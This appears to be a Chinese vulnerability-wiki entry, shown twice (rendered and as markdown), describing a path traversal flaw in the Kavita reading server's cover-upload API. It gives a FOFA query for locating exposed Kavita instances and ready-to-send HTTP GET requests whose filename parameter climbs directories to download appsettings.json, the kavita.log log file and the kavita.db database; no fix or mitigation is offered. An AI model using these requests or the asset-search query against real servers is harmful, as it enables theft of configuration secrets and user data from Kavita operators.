fofamini-wiki

登录白背景

源码

Kavita cover-upload存在敏感信息泄露漏洞

一、漏洞简介

Kavita 是一个快速、功能丰富的跨平台阅读服务器。以漫画为重点，目标是成为满足您所有阅读需求的完整解决方案。Kavita 存在安全漏洞，攻击者可利用filename参数读取下载appsettings.json、kavita.db、kavita.log等敏感信息。

二、影响版本

Kavita

三、资产测绘

fofatitle="Kavita"
特征

四、漏洞复现

GET /api/image/cover-upload?filename=../appsettings.json HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

GET /api/image/cover-upload?filename=../../config//logs/kavita.log HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

/api/image/cover-upload?filename=../../config/kavita.db

原文: https://www.yuque.com/xiaokp7/ocvun2/hy5sxvlkwgar36ui

# Kavita cover-upload存在敏感信息泄露漏洞

# 一、漏洞简介
Kavita 是一个快速、功能丰富的跨平台阅读服务器。以漫画为重点，目标是成为满足您所有阅读需求的完整解决方案。Kavita 存在安全漏洞，攻击者可利用filename参数读取下载appsettings.json、kavita.db、kavita.log等敏感信息。

# 二、影响版本

- Kavita

# 三、资产测绘

- fofa`title="Kavita"`
- 特征

![image.png](./img/H4_TfECnsCBTjx83/1714200205841-d8788b23-a9bf-422d-96b8-8affa2a67197-944475.png)

# 四、漏洞复现
```
GET /api/image/cover-upload?filename=../appsettings.json HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
```
![image.png](./img/H4_TfECnsCBTjx83/1714200274194-e42af446-2719-47a9-9ed3-6f2f1f11238c-348568.png)
```
GET /api/image/cover-upload?filename=../../config//logs/kavita.log HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
```
![image.png](./img/H4_TfECnsCBTjx83/1714200364299-33ff635f-1e9b-4523-aee5-d0a98ae00eed-214839.png)
```
/api/image/cover-upload?filename=../../config/kavita.db 
```
![image.png](./img/H4_TfECnsCBTjx83/1714214993168-bc97d561-b143-4d53-976f-1da6372dd5f3-398396.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hy5sxvlkwgar36ui>